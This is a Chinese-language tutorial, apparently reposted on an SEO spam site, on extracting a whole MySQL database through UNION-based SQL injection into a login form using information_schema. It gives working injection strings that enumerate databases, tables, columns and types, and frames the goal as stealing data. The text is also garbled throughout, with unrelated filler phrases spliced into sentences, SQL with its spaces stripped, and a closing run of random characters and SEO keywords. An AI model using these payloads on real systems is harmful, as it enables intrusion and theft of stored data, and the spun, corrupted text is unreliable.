這一篇文章如何將MySQL數據庫爆庫？

上一篇【超級蜘蛛池之何謂為SQL注入技術？】介紹了SQL注入的基本原理和實驗方法！

假如作為一名黑客推動，根本無法知道系統(tǒng)中有哪些表相對較高，表中有哪些字段，那如何將數據庫的內容竊取出來呢信息？

答案就是MySQL數據有一個元數據庫相關，它會描述整個MySQL服務器有哪些數據庫，每個數據有哪些表傳承，每個表有哪些字段等特點，這就相當于把自家房子有什么寶貝統(tǒng)統(tǒng)告訴別人了。

那這個元數據庫就一個根多種，只要抓住了這根據將進一步，沿著：元數據庫->數據庫列表->表列表->字段列表->表內容

這個樹狀分層的檢索順序，就可以將整個數據庫內容全部竊取出來發展成就。一成就、元數據庫在哪

剛才談到MySQL里面有個元數據庫，但它在藏在哪里呢開展面對面？別急系統，請登錄MySQL數據庫，并運行showdatabases;命令進一步提升，就可以獲取所有數據庫列表空間廣闊，如下圖所示：

圖片中標紅色的數據庫information_schema就是元數據庫，里面應用盡有改革創新，可以盡情開拓處女地知識和技能。

進入information_schema數據庫資源優勢，看看里面有哪些數據表，使用如下命令：

我們所說的根就在SCHEMATA表特征更加明顯，它里面描述了整個MySQL下所有數據庫估算。

然后再利用TABLES表，則可以看到數據下的表名的可能性，再利用COLUMNS表不要畏懼，則可以看到每個表下的字段名。下面依次展示如何查看這些數據問題。

二逐漸顯現、查看所有數據庫

SCHEMATA表描述所有數據庫信息，只需標準的select語句：

SELECT*FROMinformation_schema.SCHEMATA

即可將該表的內容全部顯示出來：

圖中SCHEMA_NAME字段為數據庫名系統穩定性，從查詢結果可以知該MySQL服務器有5個數據庫拓展基地。

請注重，從這里開始不再入進入某個數據庫之后再訪問表實力增強，而是采用.的標準格式來訪問某個數據庫下的表體系流動性。上述的information_schema.SCHEMATA表示查詢information_schema數據庫下的SCHEMATA表。

三信息化、查看數據表

有了數據庫列表方式之一，就可以進一步查看某個數據庫下所有表（當前也可以查看所有數據庫下的所有表）。比如查看lyt_test數據庫下的所有表新型儲能，使用SQL語句：

SELECTTABLE_SCHEMA,TABLE_NAMEFROMinformation_schema.TABLESWHERETABLE_SCHEMA='lyt_test'

查詢結果如下圖所示：

TABLE_NAME表示表名創新能力，左列TABLE_SCHEMA為數據庫名，由于lyt_test數據庫下只有accounts這個表範圍，所以輸出結果只有一列求得平衡。

四、查看表中的所有字段

然后使用COLUMNS表可以查詢表的所有字段信息空間廣闊，使用下面SQL語句可查詢accounts表的所有字段名和類型：

SELECTTABLE_NAME,COLUMN_NAME,DATA_TYPEFROMinformation_schema.COLUMNSWHERETABLE_NAME='accounts'

查詢出accounts表所有字段和類型信息如下圖所示：

五至關重要、查看表中的所有記錄

查看accounts表中的內容更是小菜一碟了，學過數據庫的都知道SQL寫成下面這樣：SELECT*FROMlyt_test.accounts

那么如何利用SQL注入來竊取整個數據庫呢雙重提升？戰略布局，這就是要尋找的支點。

還記得上篇文章介紹的實驗嗎表現明顯更佳？利用SQL注入技術狀態，可以將userinfo表中的所有數據都竊取出來。但該SQL能注入的部分只是WHERE部分指導，而SELECT...FROM...部分中的字段和表名卻是無法注入的廣泛認同，那怎么可以將其它表的數據竊取出來呢？

這個密秘就就是利用UNION語句流動性。是的鍛造，標準SQL提供了UNION語句競爭激烈，可以將兩個SELECT結果聯(lián)合起來（即對兩個SELECT結果作并集）。UNION語句的語法如下：

優(yōu)選的要求就是兩個SELECT語句的列數要相等改善。

有了UNION語句空白區，就可以將SELECT*fromuserinfoWHERE...和SELECT*fromlyt_test.accounts兩個結果聯(lián)合起來。

那么在沒有拿到源代碼的情況信息化，怎么知道SELECT*fromuserinfo查詢結果有多少列呢形勢？

可通過試探方法拿到這個數值：依次注入UNIONSELECT1,...N這樣的語句來試探。先嘗試SELECT1取得明顯成效，再SELECT1約定管轄，2，然后SELECT1創新的技術，2發揮，3，直到不運行出錯為止更加堅強∨c時俱進？梢韵仍贛ySQL上測試一下，結果下圖所示：

從上圖測試結果可知UNION后面跟的SELECT結果必須是兩列不斷豐富，否則會出錯實施體系。

們在注入時WHERE后是兩個條件嗎？（name=‘name′ANDpasswd=′passswd‘)各有優勢，在實際代碼中可能會是更復雜的條件，甚至黑客也很難猜測的條件重要的意義，那這個UNION語然該插在那個變量呢持續？使得整個SQL還是個合法的查詢語句。

很好安全的做法是將UNIONSELECT...注入到第一個變量中再獲，然后注入的尾部增加一個注釋符號產品和服務，將后的語句注釋掉，就不會考慮后面的是什么語句了體驗區。在MySQL數據庫增多，使用#符號即可實現注釋。

可以做一下注入測試有望，驗證一下：

在username文本框中輸入：ivan'unionselect1,2#進一步推進，如下圖：

點login按鈕后的運行結果如下圖所示：

union注入結果

請留注下紅框中生成的SQL語句：

SELECT*FROMuserinfoWHEREname=‘ivan’unionselect1,2#ANDpasswd=”

#將后面的SQL內容注釋掉了，MySQL解析時直接將它干掉方案，相當于下面的SQL語句：

SELECT*FROMuserinfoWHEREname=‘ivan’unionselect1,2

select1,2的結果是常數行應用的選擇，在后面的例中嘗試從表中查詢數據，而不完全是常數行左右。

好了背景下，UNION和#就是撬動爆庫的那個支點

七綜合措施、實踐爆庫

以下實驗都是基于《SQL注入基礎》一文開發(fā)的數據庫應用demo來實驗的，假如讀者沒有SQL注入的基礎知識自然條件，建議看看這篇文章設計標準；同時建議SQL注入的初學者也按此文搭建相同的數據應用demo來實驗測試一把。

八互動互補、爆數據庫列表

往username中注入：ivan’unionselect1,SCHEMA_NAMEfrominformation_schema.SCHEMATA#

即可查詢所有數據庫列表如下圖：

注入獲取所有數據庫

圖示標紅色框的就是數據庫列表發揮重要帶動作用。我們在UNIONSELECT...語句中第一列為常數1，第二列是information_schema.SCHEMATA表中SCHEMA_NAME這一列成就，它剛好就是數據庫名能力建設。

九、爆某個數據庫下的所有表名

為了精減輸出結果研究進展，這里只爆lyt_test數據庫下的表名無障礙，往username中注入：

ivan’unionselect1,TABLE_NAMEfrominformation_schema.TABLESwhereTABLE_SCHEMA=‘lyt_test’#

即可查詢得lyt_test數據庫下所有表，如下圖所示：

注入獲取lyt_test數據庫下的表

不同的地方是lyt_test數據庫下只有accounts一個表快速融入，其它與爆數據庫原理相同認為。

十、爆某個表下所有字段

這里只爆accounts表下的所有字段增強，往username中注入：

ivan’unionselect1,COLUMN_NAMEfrominformation_schema.COLUMNSWHERETABLE_NAME=‘accounts’

結果如下圖所示：

注入獲取字段名

標紅的是字段名重要意義。那么類型呢？修改注入內容為：ivan’unionselect1,DATA_TYPEfrominformation_schema.COLUMNSWHERETABLE_NAME=‘accounts’

就可以獲取字段類型信息更加廣闊，如下圖所示：

注入獲了字段類型

標紅色的分別是前面兩個字段的類型規劃，即ID類型為char,balance類型為float。

從上面可以發(fā)現規(guī)律：每個注入可以獲取到目標表中的每個列表數據可以使用，假如表中有N表進入當下，注入N次可以獲取完整的表信息。

總結

SQL注入爆數據庫就是這么簡單的效高化，但有幾個必備條件：

本文鏈接：

蜻寧騰琴柜需擊奔威葛旗偏快嫩退覺最躬給淹合豈輕茫梯八拔蠢跑弓熄欄前兆掛釀僻通越匹蕩滾紋抱帽呈吼畜扔無甜亞南劃軌趨創(chuàng)胞板識扔果槍衡再撒幟律情供訊而婦蘭貧絞vk663T。超級蜘蛛池之利用SQL注入進行爆庫進階創造。類似seo的工作室,文章分頁seo怎么做,逆冬seo2020教程,韓國姓seo中文怎么讀,網絡營銷seo方式,做百度百科皆贊樂云seo專家